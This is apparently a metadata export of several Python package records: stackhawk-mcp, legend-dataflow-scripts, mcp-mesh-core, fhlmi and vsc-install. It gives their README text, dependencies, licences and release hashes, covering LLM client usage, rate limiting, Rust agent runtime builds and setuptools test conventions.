"http://localhost:3000" name: "Development App" description: "Local development environment" ``` ### Production Configuration with Authentication ```yaml app: applicationId: "87654321-4321-4321-4321-210987654321" env: "prod" host: "https://myapp.com" name: "Production App" description: "Production environment" authentication: type: "form" username: "your-username" password: "your-password" loginUrl: "https://myapp.com/login" usernameField: "username" passwordField: "password" hawk: spider: base: true ajax: false maxDurationMinutes: 30 scan: maxDurationMinutes: 60 threads: 10 startupTimeoutMinutes: 5 failureThreshold: "high" tags: - name: "environment" value: "production" - name: "application" value: "myapp" ``` --- ## Contributing Contributions are welcome! Please open issues or pull requests for bug fixes, new features, or documentation improvements. --- ## License Apache License 2.0. See [LICENSE](LICENSE) for details. ## Release and Version Bumping Version bumps are managed via the "Prepare Release" GitHub Actions workflow. When triggering this workflow, you can select whether to bump the minor or major version. The workflow will automatically update version files, commit, and push the changes to main. > **Note:** The workflow is protected against infinite loops caused by automated version bump commits. ## GitHub Actions Authentication All CI/CD git operations use a GitHub App token for authentication. The git user and email are set from the repository secrets `HAWKY_APP_USER` and `HAWKY_APP_USER_EMAIL`. ## Workflow Protections Workflows are designed to skip jobs if the latest commit is an automated version bump, preventing workflow loops. ## How to Trigger a Release 1. Go to the "Actions" tab on GitHub. 2. Select the "Prepare Release" workflow. 3. Click "Run workflow" and choose the desired bump type (minor or major). 4. The workflow will handle the rest! <!-- mcp-name: com.stackhawk/stackhawk -->
text/markdown
null
"StackHawk, Inc." <support@stackhawk.com>
null
null
null
null
[]
[]
null
null
>=3.10
[]
[]
[]
[ "mcp>=1.0.0", "httpx>=0.27.0", "python-dotenv>=1.0.0", "PyYAML>=6.0", "jsonschema>=4.0.0", "pytest>=7.0.0; extra == \"dev\"", "pytest-asyncio>=0.21.0; extra == \"dev\"", "black>=23.0.0; extra == \"dev\"", "mypy>=1.0.0; extra == \"dev\"" ]
[]
[]
[]
[ "Homepage, https://github.com/stackhawk/stackhawk-mcp", "Repository, https://github.com/stackhawk/stackhawk-mcp" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:21:01.903370
stackhawk_mcp-1.2.1.tar.gz
45,921
d8/d6/72a206eba31248f5534496023edac14ceabae6ab34ea0f1a09f2854c689e/stackhawk_mcp-1.2.1.tar.gz
source
sdist
null
false
55b25de0dc52d3d7a343d9849bad620a
17bbd1652eef9e85abd9a5bc877faa3d9e9054aca1e62b1bcb2fa58fac25afd4
d8d672a206eba31248f5534496023edac14ceabae6ab34ea0f1a09f2854c689e
Apache-2.0
[ "LICENSE" ]
270
2.4
legend-dataflow-scripts
0.3.0a4
Python package for the processing scripts for LEGEND-200 data
# LEGEND dataflow scripts [![PyPI](https://img.shields.io/pypi/v/legend-dataflow-scripts?logo=pypi)](https://pypi.org/project/legend-dataflow-scripts/) ![GitHub tag (latest by date)](https://img.shields.io/github/v/tag/legend-exp/legend-dataflow-scripts?logo=git) [![GitHub Workflow Status](https://img.shields.io/github/checks-status/legend-exp/legend-dataflow-scripts/main?label=main%20branch&logo=github)](https://github.com/legend-exp/legend-dataflow-scripts/actions) [![pre-commit](https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit&logoColor=white)](https://github.com/pre-commit/pre-commit) [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) [![Codecov](https://img.shields.io/codecov/c/github/legend-exp/legend-dataflow-scripts?logo=codecov)](https://app.codecov.io/gh/legend-exp/legend-dataflow-scripts) ![GitHub issues](https://img.shields.io/github/issues/legend-exp/legend-dataflow-scripts?logo=github) ![GitHub pull requests](https://img.shields.io/github/issues-pr/legend-exp/legend-dataflow-scripts?logo=github) ![License](https://img.shields.io/github/license/legend-exp/legend-dataflow-scripts) [![Read the Docs](https://img.shields.io/readthedocs/legend-dataflow-scripts?logo=readthedocs)](https://legend-dataflow-scripts.readthedocs.io) Scripts used in the LEGEND data processing. These scripts are general enough to be used in test stand processings also.
text/markdown
null
George Marshall <ggmarsh@uw.edu>, Luigi Pertoldi <gipert@pm.me>
The LEGEND Collaboration
null
null
null
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Operating System :: MacOS", "Operating System :: POSIX", "Operating System :: Unix", "Programming Language :: Python", "Programming Language :: Pyt...
[]
null
null
>=3.11
[]
[]
[]
[ "colorlog", "dbetto>=1.2.3", "pygama>=2.3.0a1", "dspeed>=2.0", "pylegendmeta>=1.2.5", "legend-pydataobj>=1.16", "pip", "legend-dataflow-scripts; extra == \"test\"", "pytest>=6; extra == \"test\"", "pytest-cov>=3; extra == \"test\"", "legend-dataflow-scripts[test]; extra == \"dev\"", "pre-commi...
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:20:53.592491
legend_dataflow_scripts-0.3.0a4.tar.gz
47,981
0e/ac/1c23f3c949e6ed2b661758e9488045a2a807e708315fe18e0bc8e8838e92/legend_dataflow_scripts-0.3.0a4.tar.gz
source
sdist
null
false
ab53a807f5b623336e55e545d97cc7d0
3faa28ea21f9d8d7ce30cda77240c756f56d470a81c81a2503dfbaa94c4301d3
0eac1c23f3c949e6ed2b661758e9488045a2a807e708315fe18e0bc8e8838e92
null
[]
200
2.4
mcp-mesh-core
0.9.6
Rust core runtime for MCP Mesh agents
# MCP Mesh Core Rust core runtime for MCP Mesh agents. This library handles: - Agent startup and registration - Heartbeat loop (fast HEAD + conditional POST) - Topology management and change detection - Event streaming to language SDKs ## Building ```bash # Install maturin pip install maturin # Build and install in development mode maturin develop # Build release wheel maturin build --release ``` ## Usage from Python ```python from mcp_mesh_core import AgentSpec, start_agent # Create agent specification spec = AgentSpec( name="my-agent", version="1.0.0", registry_url="http://localhost:8100", http_port=9000, capabilities=[...], dependencies=[...], ) # Start agent (returns handle) handle = start_agent(spec) # Listen for topology events async def event_loop(): while True: event = await handle.next_event() print(f"Event: {event.event_type}") ``` ## Architecture ``` Python SDK Rust Core ─────────────────────────────────────────── Decorators → Metadata collection → AgentSpec ↓ start_agent() ↓ AgentRuntime ├─ HeartbeatLoop ├─ RegistryClient └─ TopologyManager ↓ Event listener ← EventStream DI updates ← MeshEvent ```
text/markdown; charset=UTF-8; variant=GFM
null
MCP Mesh Contributors <noreply@mcp-mesh.dev>
null
null
MIT
null
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Rust", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3...
[]
null
null
>=3.11
[]
[]
[]
[]
[]
[]
[]
[ "Homepage, https://github.com/dhyansraj/mcp-mesh", "Issues, https://github.com/dhyansraj/mcp-mesh/issues", "Repository, https://github.com/dhyansraj/mcp-mesh" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:20:50.719621
mcp_mesh_core-0.9.6-cp314-cp314-win_amd64.whl
2,396,534
ed/c7/f434a5d7cf5df6caf2bbc6fc548354a1cbba78881d2edfd0a9b8271a353b/mcp_mesh_core-0.9.6-cp314-cp314-win_amd64.whl
cp314
bdist_wheel
null
false
17c622e06eb61d093fef202dec6464cd
b2738b912dbc969401eb4bc1a0dcfc2c29eaf3ff10e2dcd04c3c42136706d602
edc7f434a5d7cf5df6caf2bbc6fc548354a1cbba78881d2edfd0a9b8271a353b
null
[]
1,378
2.4
fhlmi
0.44.0
A client to provide LLM responses for FutureHouse applications.
# Language Model Interface (LMI) <!-- pyml disable-num-lines 6 line-length --> [![GitHub](https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&logo=github&logoColor=white)](https://github.com/Future-House/ldp/tree/main/packages/lmi) [![PyPI version](https://badge.fury.io/py/fhlmi.svg)](https://badge.fury.io/py/fhlmi) [![tests](https://github.com/Future-House/ldp/actions/workflows/tests.yml/badge.svg)](https://github.com/Future-House/ldp/tree/main/packages/lmi) ![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg) ![PyPI Python Versions](https://img.shields.io/pypi/pyversions/fhlmi) A Python library for interacting with Large Language Models (LLMs) through a unified interface, hence the name Language Model Interface (LMI). ## Installation ```bash pip install fhlmi ``` <!--TOC--> --- **Table of Contents** - [Installation](#installation) - [Quick start](#quick-start) - [Documentation](#documentation) - [LLMs](#llms) - [LLMModel](#llmmodel) - [LiteLLMModel](#litellmmodel) - [Cost tracking](#cost-tracking) - [Rate limiting](#rate-limiting) - [Basic Usage](#basic-usage) - [Rate Limit Format](#rate-limit-format) - [Storage Options](#storage-options) - [Monitoring Rate Limits](#monitoring-rate-limits) - [Timeout Configuration](#timeout-configuration) - [Weight-based Rate Limiting](#weight-based-rate-limiting) - [Tool calling](#tool-calling) - [Vertex](#vertex) - [Embedding models](#embedding-models) - [LiteLLMEmbeddingModel](#litellmembeddingmodel) - [HybridEmbeddingModel](#hybridembeddingmodel) - [SentenceTransformerEmbeddingModel](#sentencetransformerembeddingmodel) --- <!--TOC--> ## Quick start A simple example of how to use the library with default settings is shown below. ```python from lmi import LiteLLMModel from aviary.core import Message llm = LiteLLMModel() messages = [Message(content="What is the meaning of life?")] result = await llm.call_single(messages) # assert result.text == "42" ``` or, if you only have one user message, just: ```python from lmi import LiteLLMModel llm = LiteLLMModel() result = await llm.call_single("What is the meaning of life?") # assert result.text == "42" ``` ## Documentation ### LLMs An LLM is a class that inherits from `LLMModel` and implements the following methods: - `async acompletion(messages: list[Message], **kwargs) -> list[LLMResult]` - `async acompletion_iter(messages: list[Message], **kwargs) -> AsyncIterator[LLMResult]` These methods are used by the base class `LLMModel` to implement the LLM interface. Because `LLMModel` is an abstract class, it doesn't depend on any specific LLM provider. All the connection with the provider is done in the subclasses using `acompletion` and `acompletion_iter` as interfaces. Because these are the only methods that communicate with the chosen LLM provider, we use an abstraction [LLMResult](https://github.com/Future-House/ldp/blob/main/packages/lmi/src/lmi/types.py#L35) to hold the results of the LLM call. #### LLMModel An `LLMModel` implements `call`, which receives a list of `aviary` `Message`s and returns a list of `LLMResult`s. `LLMModel.call` can receive callbacks, tools, and output schemas to control its behavior, as better explained below. Because we support interacting with the LLMs using `Message` objects, we can use the modalities available in `aviary`, which currently include text and images. `lmi` supports these modalities but does not support other modalities yet. Adittionally, `LLMModel.call_single` can be used to return a single `LLMResult` completion. #### LiteLLMModel `LiteLLMModel` wraps `LiteLLM` API usage within our `LLMModel` interface. It receives a `name` parameter, which is the name of the model to use and a `config` parameter, which is a dictionary of configuration options for the model following the [LiteLLM configuration schema](https://docs.litellm.ai/docs/routing). Common parameters such as `temperature`, `max_token`, and `n` (the number of completions to return) can be passed as part of the `config` dictionary. ```python import os from lmi import LiteLLMModel config = { "model_list": [ { "model_name": "gpt-4o", "litellm_params": { "model": "gpt-4o", "api_key": os.getenv("OPENAI_API_KEY"), "frequency_penalty": 1.5, "top_p": 0.9, "max_tokens": 512, "temperature": 0.1, "n": 5, }, } ] } llm = LiteLLMModel(name="gpt-4o", config=config) ``` `config` can also be used to pass common parameters directly for the model. ```python from lmi import LiteLLMModel config = { "name": "gpt-4o", "temperature": 0.1, "max_tokens": 512, "n": 5, } llm = LiteLLMModel(config=config) ``` ### Cost tracking Cost tracking is supported in two different ways: 1. Calls to the LLM return the token usage for each call in `LLMResult.prompt_count` and `LLMResult.completion_count`. Additionally, `LLMResult.cost` can be used to get a cost estimate for the call in USD. 2. A global cost tracker is maintained in `GLOBAL_COST_TRACKER` and can be enabled or disabled using `enable_cost_tracking()` and `cost_tracking_ctx()`. ### Rate limiting Rate limiting helps regulate the usage of resources to various services and LLMs. The rate limiter supports both in-memory and Redis-based storage for cross-process rate limiting. Currently, `lmi` take into account the tokens used (Tokens per Minute (TPM)) and the requests handled (Requests per Minute (RPM)). #### Basic Usage Rate limits can be configured in two ways: 1. Through the LLM configuration: ```python from lmi import LiteLLMModel config = { "rate_limit": { "gpt-4": "100/minute", # 100 tokens per minute }, "request_limit": { "gpt-4": "5/minute", # 5 requests per minute }, } llm = LiteLLMModel(name="gpt-4", config=config) ``` With `rate_limit` we rate limit only token consumption, and with `request_limit` we rate limit only request volume. You can configure both of them or only one of them as you need. 2. Through the global rate limiter configuration: ```python from lmi.rate_limiter import GLOBAL_LIMITER GLOBAL_LIMITER.rate_config[("client", "gpt-4")] = "100/minute" # tokens per minute GLOBAL_LIMITER.rate_config[("client|request", "gpt-4")] = ( "5/minute" # requests per minute ) ``` With `client` we rate limit only token consumption, and with `client|request` we rate limit only request volume. You can configure both of them or only one of them as you need. #### Rate Limit Format Rate limits can be specified in two formats: 1. As a string: `"<count> [per|/] [n (optional)] <second|minute|hour|day|month|year>"` ```python "100/minute" # 100 tokens per minute "5 per second" # 5 tokens per second "1000/day" # 1000 tokens per day ``` 2. Using RateLimitItem classes: ```python from limits import RateLimitItemPerSecond, RateLimitItemPerMinute RateLimitItemPerSecond(30, 1) # 30 tokens per second RateLimitItemPerMinute(1000, 1) # 1000 tokens per minute ``` #### Storage Options The rate limiter supports two storage backends: 1. In-memory storage (default when Redis is not configured): ```python from lmi.rate_limiter import GlobalRateLimiter limiter = GlobalRateLimiter(use_in_memory=True) ``` 2. Redis storage (for cross-process rate limiting): ```python # Set REDIS_URL environment variable import os os.environ["REDIS_URL"] = "localhost:6379" from lmi.rate_limiter import GlobalRateLimiter limiter = GlobalRateLimiter() # Will automatically use Redis if REDIS_URL is set ``` This `limiter` can be used in within the `LLMModel.check_rate_limit` method to check the rate limit before making a request, similarly to how it is done in the [`LiteLLMModel` class][1]. [1]: https://github.com/Future-House/ldp/blob/18138af155bef7686d1eb2b486edbc02d62037eb/packages/lmi/src/lmi/llms.py #### Monitoring Rate Limits You can monitor current rate limit status: ```python from lmi.rate_limiter import GLOBAL_LIMITER from lmi import LiteLLMModel from aviary.core import Message config = { "rate_limit": { "gpt-4": "100/minute", # 100 tokens per minute }, "request_limit": { "gpt-4": "5/minute", # 5 requests per minute }, } llm = LiteLLMModel(name="gpt-4", config=config) results = await llm.call([Message(content="Hello, world!")]) # Consume some tokens status = await GLOBAL_LIMITER.rate_limit_status() # Example output: { ("client|request", "gpt-4"): { # the limit status for requests "period_start": 1234567890, "n_items_in_period": 1, "period_seconds": 60, "period_name": "minute", "period_cap": 5, }, ("client", "gpt-4"): { # the limit status for tokens "period_start": 1234567890, "n_items_in_period": 50, "period_seconds": 60, "period_name": "minute", "period_cap": 100, }, } ``` #### Timeout Configuration The default timeout for rate limiting is 60 seconds, but can be configured: ```python import os os.environ["RATE_LIMITER_TIMEOUT"] = "30" # 30 seconds timeout ``` #### Weight-based Rate Limiting Rate limits can account for different weights (e.g., token counts for LLM requests): ```python await GLOBAL_LIMITER.try_acquire( ("client", "gpt-4"), weight=token_count, # Number of tokens in the request acquire_timeout=30.0, # Optional timeout override ) ``` ### Tool calling LMI supports function calling through tools, which are functions that the LLM can invoke. Tools are passed to `LLMModel.call` or `LLMModel.call_single` as a list of [`Tool` objects from `aviary`][2], along with an optional `tool_choice` parameter that controls how the LLM uses these tools. [2]: https://github.com/Future-House/aviary/blob/1a50b116fb317c3ef27b45ea628781eb53c0b7ae/src/aviary/tools/base.py#L334 The `tool_choice` parameter follows `OpenAI`'s definition. It can be: | Tool Choice Value | Constant | Behavior | | ------------------------------- | ---------------------------------- | ------------------------------------------------------------------------------ | | `"none"` | `LLMModel.NO_TOOL_CHOICE` | The model will not call any tools and instead generates a message | | `"auto"` | `LLMModel.MODEL_CHOOSES_TOOL` | The model can choose between generating a message or calling one or more tools | | `"required"` | `LLMModel.TOOL_CHOICE_REQUIRED` | The model must call one or more tools | | A specific `aviary.Tool` object | N/A | The model must call this specific tool | | `None` | `LLMModel.UNSPECIFIED_TOOL_CHOICE` | No tool choice preference is provided to the LLM API | When tools are provided, the LLM's response will be wrapped in a `ToolRequestMessage` instead of a regular `Message`. The key differences are: - `Message` represents a basic chat message with a role (system/user/assistant) and content - `ToolRequestMessage` extends `Message` to include `tool_calls`, which contains a list of `ToolCall` objects, which contains the tools the LLM chose to invoke and their arguments Further details about how to define a tool, use the `ToolRequestMessage` and the `ToolCall` objects can be found in the [Aviary documentation](https://github.com/Future-House/aviary?tab=readme-ov-file#tool). Here is a minimal example usage: ```python from lmi import LiteLLMModel from aviary.core import Message, Tool import operator # Define a function that will be used as a tool def calculator(operation: str, x: float, y: float) -> float: """ Performs basic arithmetic operations on two numbers. Args: operation (str): The arithmetic operation to perform ("+", "-", "*", or "/") x (float): The first number y (float): The second number Returns: float: The result of applying the operation to x and y Raises: KeyError: If operation is not one of "+", "-", "*", "/" ZeroDivisionError: If operation is "/" and y is 0 """ operations = { "+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv, } return operations[operation](x, y) # Create a tool from the calculator function calculator_tool = Tool.from_function(calculator) # The LLM must use the calculator tool llm = LiteLLMModel() result = await llm.call_single( messages=[Message(content="What is 2 + 2?")], tools=[calculator_tool], tool_choice=LiteLLMModel.TOOL_CHOICE_REQUIRED, ) # result.messages[0] will be a ToolRequestMessage with tool_calls containing # the calculator invocation with x=2, y=2, operation="+" ``` ### Vertex Vertex requires a bit of extra set-up. First, install the extra dependency for auth: ```sh pip install google-api-python-client ``` and then you need to configure which region/project you're using for the model calls. Make sure you're authed for that region/project. Typically that means running: ```sh gcloud auth application-default login ``` Then you can use vertex models: ```py from lmi import LiteLLMModel from aviary.core import Message vertex_config = {"vertex_project": "PROJECT_ID", "vertex_location": "REGION"} llm = LiteLLMModel(name="vertex_ai/gemini-2.5-pro", config=vertex_config) await llm.call_single("hey") ``` ### Embedding models This client also includes embedding models. An embedding model is a class that inherits from `EmbeddingModel` and implements the `embed_documents` method, which receives a list of strings and returns a list with a list of floats (the embeddings) for each string. Currently, the following embedding models are supported: - `LiteLLMEmbeddingModel` - `SparseEmbeddingModel` - `SentenceTransformerEmbeddingModel` - `HybridEmbeddingModel` #### LiteLLMEmbeddingModel `LiteLLMEmbeddingModel` provides a wrapper around LiteLLM's embedding functionality. It supports various embedding models through the LiteLLM interface, with automatic dimension inference and token limit handling. It defaults to `text-embedding-3-small` and can be configured with `name` and `config` parameters. Notice that `LiteLLMEmbeddingModel` can also be rate limited. ```python from lmi import LiteLLMEmbeddingModel model = LiteLLMEmbeddingModel( name="text-embedding-3-small", config={"rate_limit": "100/minute", "batch_size": 16}, ) embeddings = await model.embed_documents(["text1", "text2", "text3"]) ``` #### HybridEmbeddingModel `HybridEmbeddingModel` combines multiple embedding models by concatenating their outputs. It is typically used to combine a dense embedding model (like `LiteLLMEmbeddingModel`) with a sparse embedding model for improved performance. The model can be created in two ways: ```python from lmi import LiteLLMEmbeddingModel, SparseEmbeddingModel, HybridEmbeddingModel dense_model = LiteLLMEmbeddingModel(name="text-embedding-3-small") sparse_model = SparseEmbeddingModel() hybrid_model = HybridEmbeddingModel(models=[dense_model, sparse_model]) ``` The resulting embedding dimension will be the sum of the dimensions of all component models. For example, if you combine a 1536-dimensional dense embedding with a 256-dimensional sparse embedding, the final embedding will be 1792-dimensional. #### SentenceTransformerEmbeddingModel You can also use `sentence-transformer`, which is a local embedding library with support for HuggingFace models, by installing `lmi[local]`.
text/markdown
null
FutureHouse technical staff <hello@futurehouse.org>
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright 2025 FutureHouse Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[ "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "P...
[]
null
null
>=3.11
[]
[]
[]
[ "coredis>=3.0.1", "fhaviary>=0.14.0", "limits[async-redis]>=4.8", "litellm>=1.81.10", "pydantic>=2.10.1,~=2.0", "tiktoken>=0.4.0", "typing-extensions; python_version <= \"3.11\"", "fhaviary[xml]; extra == \"dev\"", "fhlmi[image,local,progress,typing,vcr]; extra == \"dev\"", "google-auth>=2; extra ...
[]
[]
[]
[ "issues, https://github.com/Future-House/ldp/packages/lmi/issues", "repository, https://github.com/Future-House/ldp/packages/lmi" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:19:43.489081
fhlmi-0.44.0.tar.gz
484,011
68/00/62e640f77cf9b0e27d94b58347291b6ab5c816ef0e157644d921337a6593/fhlmi-0.44.0.tar.gz
source
sdist
null
false
b26de7d518b1f5b644412b3412a85814
e08285cfd3f5208a737f47835611cb0234c3076908d90730c876855f891331e7
680062e640f77cf9b0e27d94b58347291b6ab5c816ef0e157644d921337a6593
null
[ "LICENSE" ]
1,152
2.1
vsc-install
0.24.0
vsc-install provides shared setuptools functions and classes for python libraries developed by UGent's HPC group
Description =========== vsc-install provides shared setuptools functions and classes for python libraries developed by UGent's HPC group Common pitfalls ========= bdist_rpm will fail if your install_requires = 'setuptools' because it will fail to find a setuptools rpm. ``` export VSC_RPM_PYTHON=1 ``` will make sure the `python-` prefix is added to the packages in install_requires for building RPM's so python-setuptools will be used. Add tests ========= Test are python modules in the `test` directory which have subclass of `TestCase` and at least one method that has a name starting with `test_` You are advised to use ```python from vsc.install.testing import TestCase ``` (instead of basic `TestCase` from `unittest`). And any `__main__` or `suite()` is not needed (anymore). Initialise the test directory with ```bash mkdir -p test echo '' > test/__init__.py echo 'from vsc.install.commontest import CommonTest' > test/00-import.py ``` When the tests are run, `test`, `lib` and `bin` (if relevant) are added to `sys.path`, so no need to do so in the tets modules. Run tests ========= ```bash python setup.py test ``` Filter tests with `-F` (test module names) and `-f` (test method names) See also ```bash python setup.py test --help ``` The dependencies are installed automatically in the `.eggs` directory. It will first try `github.ugent.be` and then `github.com` to install them. The same method is used as through which the original repository was cloned (http, ssh, ...). In case you need private dependencies, always clone with ssh. In case following error occurs, it means there is a test module `XYZ` that cannot be imported. ```txt File "setup.py", line 499, in loadTestsFromModule testsuites = ScanningLoader.loadTestsFromModule(self, module) File "build/bdist.linux-x86_64/egg/setuptools/command/test.py", line 37, in loadTestsFromModule File "/usr/lib64/python2.7/unittest/loader.py", line 100, in loadTestsFromName parent, obj = obj, getattr(obj, part) AttributeError: 'module' object has no attribute 'XYZ' ``` You can try get the actual import error for fixing the issue with ```bash python -c 'import sys;sys.path.insert(0, "test");import XYZ;' ``` Fix failing tests ================= * Missing / incorrect `LICENSE` * Copy the appropirate license file under `known_licenses` in the project directory and name the file `LICENSE` * Missing `README.md` * Create a `README.md` file with at least a `Description` section * Fix license headers as described in https://github.com/hpcugent/vsc-install/blob/master/lib/vsc/install/headers.py ``` cd <project dir with .git folder> REPO_BASE_DIR=$PWD python -m vsc.install.headers path/to/file script_or_not ``` Fix them all at once using find ``` find ./{lib,test} -type f -name '*.py' | REPO_BASE_DIR=$PWD xargs -I '{}' python -m vsc.install.headers '{}' find ./bin -type f -name '*.py' | REPO_BASE_DIR=$PWD xargs -I '{}' python -m vsc.install.headers '{}' 1 ``` Do not forget to check the diff. Modules/scripts without docstring (or magic comment '### END OF HEADER') (incl. test modules) will get correct header appended to existing one. Add a docstring (or magic comment) to resolve this. * Python scripts (i.e. with a python shebang and installed as scripts in setup) have to use `#!/usr/bin/env python` as shebang * Remove any `build_rpms_settings.sh` leftovers * The `TARGET` dict in `setup.py` should be minimal unless you really know what you are doing (i.e. if it is truly different from defaults) * Remove `name`, `scripts`, ... * `Exception: vsc namespace packages do not allow non-shared namespace` * Add to the `__init__.py` ```python """ Allow other packages to extend this namespace, zip safe setuptools style """ import pkg_resources pkg_resources.declare_namespace(__name__) ``` bare-except ----------- ```python try: # something except: ``` This is bad, because this except will also catch sys.exit() or Keyboardinterupts, something you typically do not want, if you catch these the 